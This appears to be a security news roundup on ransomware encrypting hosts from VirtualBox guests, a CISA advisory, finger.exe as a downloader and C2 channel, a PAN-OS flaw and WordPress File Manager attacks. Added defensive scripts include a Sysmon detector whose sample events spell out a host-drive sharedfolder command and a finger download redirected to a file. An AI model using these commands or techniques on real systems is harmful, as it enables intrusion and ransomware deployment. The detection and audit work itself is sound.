
The Maze ransomware operators have adopted a tactic previously used by the Ragnar Locker gang: encrypting a computer from within a virtual machine.

In May, we reported that Ragnar Locker had been seen encrypting files through VirtualBox Windows XP virtual machines to bypass security software on the host. The virtual machine would mount the host's drives as shares visible inside the guest, and the ransomware would then run inside the guest to encrypt the files on those shares.

Because the virtual machine runs no security software, and because every write to the host's files arrives through the legitimate VirtualBox process rather than from the ransomware binary, the host's security software cannot detect the malware and block it.


The US Cybersecurity and Infrastructure Security Agency (CISA) issued a new advisory on Monday about a wave of cyberattacks carried out by Chinese nation-state actors targeting US government agencies and private entities.

“CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People’s Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,” the cybersecurity agency said.

Over the past 12 months, the actors picked victims using sources such as Shodan, the Common Vulnerabilities and Exposures (CVE) list, and the National Vulnerability Database (NVD), moving on newly published vulnerabilities to find exposed targets and further their goals.

The list of native Windows executables that can download or run malicious code keeps growing, with another one reported recently.

These are known as living-off-the-land binaries (LoLBins) and can help attackers bypass security controls to fetch malware without triggering a security alert on the system.

Works for download and exfil

The latest addition is finger.exe, a command that ships with Windows to retrieve information about users on remote computers running the Finger service or daemon. Communication uses the Name/Finger protocol (RFC 1288) over TCP port 79.

Security researcher John Page discovered that the Microsoft Windows TCPIP Finger command can also function as a file downloader and as a makeshift command and control (C2) channel that can be used to send commands and exfiltrate data.
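Both techniques above leave the same kind of footprint on the host: a process that rarely appears in a normal estate (VBoxManage.exe handing host drives to a guest, a VM booted headless from a shell, finger.exe at all) or a connection on a port nothing else uses. The following is an added example, not code from the original article or from any of the researchers it cites: a small detection pass over Sysmon-style process-creation (ID 1) and network-connection (ID 3) events that flags the VirtualBox-sharedfolder pattern from the Ragnar Locker/Maze section and the finger.exe downloader pattern from this one. The events, paths, VM name and the documentation address 203.0.113.10 are all constructed for the demonstration and are not indicators taken from the reports; the set of "script host" parents is an assumption you would tune to your environment.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Shell and script hosts: a user launches VirtualBox from explorer.exe, a
# dropper launches it from one of these. (Assumption for this example.)
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "msiexec.exe"}


@dataclass
class Event:
    """Subset of Sysmon fields: ID 1 = process creation, ID 3 = network connection."""
    event_id: int
    image: str
    command_line: str = ""
    parent_image: str = ""
    dest_port: Optional[int] = None


def basename(path: str) -> str:
    """Last component of a Windows or POSIX path, lower-cased."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule, detail) pairs; an event can match more than one rule."""
    alerts: List[Tuple[str, str]] = []
    for ev in events:
        img = basename(ev.image)
        parent = basename(ev.parent_image)
        cmd = ev.command_line
        if ev.event_id == 1:
            # Host drives handed to a guest as shared folders: the step that
            # lets ransomware inside the VM reach the host's files.
            if img == "vboxmanage.exe" and re.search(r"sharedfolder\s+add", cmd, re.I):
                alerts.append(("vbox_sharedfolder_host_drive", cmd))
            # A VM booted headless by a shell or script host rather than a user.
            headless = img == "vboxheadless.exe" or (
                img == "vboxmanage.exe" and re.search(r"\bstartvm\b", cmd, re.I))
            if headless and parent in SCRIPT_HOSTS:
                alerts.append(("vbox_vm_started_from_script", f"{parent} -> {cmd}"))
            # finger.exe has no routine use on a modern Windows estate.
            if img == "finger.exe":
                alerts.append(("finger_exe_executed", cmd))
            # The downloader pattern: a shell piping or redirecting finger output.
            if img in SCRIPT_HOSTS and re.search(r"\bfinger(\.exe)?\b", cmd, re.I) \
                    and re.search(r"[|>]", cmd):
                alerts.append(("finger_output_redirected", cmd))
        elif ev.event_id == 3 and ev.dest_port == 79:
            # Finger is TCP/79 and nothing else of note listens there.
            alerts.append(("outbound_finger_port", f"{img} -> tcp/79"))
    return alerts


# Constructed events for the demonstration (paths, VM name and the
# documentation address 203.0.113.10 are made up, not indicators from the reports).
VBOX = r"C:\Program Files\Oracle\VirtualBox"
SAMPLE_EVENTS = [
    Event(1, VBOX + r"\VBoxManage.exe",
          r'VBoxManage.exe sharedfolder add "vm1" --name C_DRIVE --hostpath C:\ --automount',
          r"C:\Windows\System32\cmd.exe"),
    Event(1, VBOX + r"\VBoxHeadless.exe", "VBoxHeadless.exe --startvm vm1",
          r"C:\Windows\System32\cmd.exe"),
    Event(1, VBOX + r"\VirtualBox.exe", "VirtualBox.exe",
          r"C:\Windows\explorer.exe"),                       # interactive, benign
    Event(1, r"C:\Windows\System32\finger.exe", "finger user@203.0.113.10",
          r"C:\Windows\System32\cmd.exe"),
    Event(3, r"C:\Windows\System32\finger.exe", dest_port=79),
    Event(1, r"C:\Windows\System32\cmd.exe",
          r"cmd.exe /c finger user@203.0.113.10 > C:\Users\Public\update.txt",
          r"C:\Windows\System32\wscript.exe"),
    Event(1, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          "chrome.exe", r"C:\Windows\explorer.exe"),          # benign
    Event(3, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          dest_port=443),                                     # benign
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:32} {detail}")
```

The VirtualBox rules key on the two steps the ransomware cannot skip (exposing the host's drives to the guest and starting the guest), so a renamed VM or a different guest OS does not evade them; the finger rules are deliberately broad because the binary has almost no legitimate callers, and the port rule catches a renamed copy of it. Run the same logic over real Sysmon exports before trusting the parent list, since software deployment tools can legitimately launch VBoxManage.exe from msiexec.exe.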

Palo Alto Networks has fixed a new critical vulnerability affecting multiple versions of PAN-OS, the operating system running on its next-generation firewalls.

The issue has been assigned CVE-2020-2040, carries a severity score of 9.8 out of 10, and requires no user interaction. It is a buffer overflow that an unauthenticated attacker can trigger by sending a malicious request to specific interfaces (the Captive Portal or Multi-Factor Authentication interface, when either is enabled).

Code execution potential

In an advisory updated today, the company disclosed that the vulnerability was discovered during an internal security review by Yamata Li, a member of its Threat Research Team.

The same researcher is credited with finding another critical-severity flaw in PAN-OS (CVE-2020-2034, an OS command injection) that allows executing arbitrary commands with root privileges without authentication.


Attackers actively exploiting a critical remote code execution flaw affecting over 600,000 WordPress sites running vulnerable File Manager plugin versions have also been seen protecting the sites they compromise from other threat actors' attacks.

The critical vulnerability allows unauthenticated attackers to upload malicious PHP files and execute arbitrary code following successful exploitation. File Manager's developers addressed the flaw with the release of File Manager 6.9.

The flaw was patched within hours of being reported by Seravo on-call security officer Ville Korhonen, who discovered the zero-day and the attacks already trying to exploit it. Even so, researchers at WordPress security firm Defiant saw more than 1.7 million sites being probed by threat actors between September 1 and September 3.

In an updated report published today, Defiant threat analyst Ram Gall says the threat actors have not stopped their siege, with the total number of targeted WordPress sites rising to 2.6 million.
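Because the exploit is an unauthenticated upload, the questions a site owner needs answered are concrete: is the plugin below 6.9, is the elFinder connector reachable as a .php file, and has anything executable already landed in the library's upload directory. The following is an added example, not code from the article, from Defiant, or from the plugin's developers: a read-only audit that answers those three questions for one WordPress root. The paths it checks (wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php and lib/files/) are those reported for this vulnerability; the sample install it builds in a temporary directory is constructed for the demonstration, and reading the version from the readme.txt "Stable tag" line is an assumption based on the WordPress.org plugin convention.

```python
import os
import re
import tempfile
from typing import Dict, Optional, Tuple

# Locations reported for this issue: the plugin directory, the elFinder
# connector attackers posted upload requests to, and where uploads landed.
PLUGIN_SUBDIR = os.path.join("wp-content", "plugins", "wp-file-manager")
CONNECTOR = os.path.join("lib", "php", "connector.minimal.php")
UPLOAD_DIR = os.path.join("lib", "files")
FIXED_VERSION = (6, 9)
PHP_EXTENSIONS = (".php", ".php5", ".php7", ".phtml", ".phar")


def plugin_version(plugin_dir: str) -> Optional[Tuple[int, ...]]:
    """Read 'Stable tag: x.y' from readme.txt (WordPress.org convention; assumption)."""
    readme = os.path.join(plugin_dir, "readme.txt")
    if not os.path.isfile(readme):
        return None
    with open(readme, encoding="utf-8", errors="replace") as fh:
        m = re.search(r"^Stable tag:\s*(\d+(?:\.\d+)*)", fh.read(), re.M | re.I)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def audit(wp_root: str) -> Dict:
    """Audit one WordPress root; returns findings and never modifies anything."""
    plugin_dir = os.path.join(wp_root, PLUGIN_SUBDIR)
    result = {
        "installed": os.path.isdir(plugin_dir),
        "version": None,
        "vulnerable_version": False,   # below 6.9; tuple compare keeps 6.10 > 6.9
        "connector_exposed": False,    # connector present as .php, not .php.dist
        "php_in_upload_dir": [],       # server-side scripts under lib/files/
    }
    if not result["installed"]:
        return result
    version = plugin_version(plugin_dir)
    result["version"] = version
    result["vulnerable_version"] = version is not None and version < FIXED_VERSION
    result["connector_exposed"] = os.path.isfile(os.path.join(plugin_dir, CONNECTOR))
    for root, _, files in os.walk(os.path.join(plugin_dir, UPLOAD_DIR)):
        for name in files:
            if name.lower().endswith(PHP_EXTENSIONS):
                result["php_in_upload_dir"].append(
                    os.path.relpath(os.path.join(root, name), plugin_dir))
    return result


def build_sample_install(version: str, expose_connector: bool, drop_script: bool,
                         install_plugin: bool = True) -> str:
    """Constructed WordPress tree for the demonstration; returns its root."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    if not install_plugin:
        return root
    plugin_dir = os.path.join(root, PLUGIN_SUBDIR)
    os.makedirs(os.path.join(plugin_dir, "lib", "php"))
    os.makedirs(os.path.join(plugin_dir, UPLOAD_DIR))
    with open(os.path.join(plugin_dir, "readme.txt"), "w") as fh:
        fh.write(f"=== File Manager ===\nStable tag: {version}\n")
    connector = os.path.join(plugin_dir, CONNECTOR)
    if not expose_connector:
        connector += ".dist"           # shipped name: not executed as PHP by the server
    with open(connector, "w") as fh:
        fh.write("<?php // placeholder standing in for the elFinder connector\n")
    if drop_script:
        with open(os.path.join(plugin_dir, UPLOAD_DIR, "x.php"), "w") as fh:
            fh.write("<?php // inert placeholder standing in for an uploaded script\n")
    return root


if __name__ == "__main__":
    for label, args in (("unpatched", ("6.8", True, True)),
                        ("patched", ("6.9", False, False))):
        print(label, audit(build_sample_install(*args)))
```

Point `audit()` at a real document root to use it; a clean result still does not prove the site was never hit, since the attackers were observed locking the connector after use, so on a site that ran 6.8 during the attack window treat any unexplained file under lib/files/ or any change to the connector as grounds for a full review rather than a simple upgrade.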